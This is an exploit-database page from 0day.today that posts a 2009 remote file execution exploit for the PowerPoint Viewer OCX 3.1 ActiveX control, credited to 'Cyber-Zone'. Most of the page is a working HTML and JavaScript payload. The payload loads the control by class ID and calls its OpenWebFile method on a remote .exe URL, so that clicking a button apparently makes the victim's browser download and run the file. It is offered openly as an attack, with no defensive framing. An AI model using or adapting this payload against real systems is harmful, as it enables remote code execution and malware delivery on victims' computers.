[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PowerPoint Viewer OCX 3.1 Remote File Execution Exploit

Author
Cyber-Zone
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9338
Category
remote exploits
Date add
13-01-2009
Platform
unsorted
=======================================================
PowerPoint Viewer OCX 3.1 Remote File Execution Exploit
=======================================================

PowerPoint Viewer OCX v3.1 Remote File Execution Exploit

Founded By : Cyber-Zone
E-mail     : Paradis_des_fous@hotmail.fr
Home       : WwW.Exploiter5.CoM
GreetZ     : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum



<HTML>
<BODY>
 <object id=Cyb classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22B92}"></object>

<SCRIPT>

function Do_it()
 {
   File = "http://test.com/file.exe"
   Cyb.OpenWebFile(File)
 }


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">

</body>
</HTML>




#  0day.today [2024-11-16]  #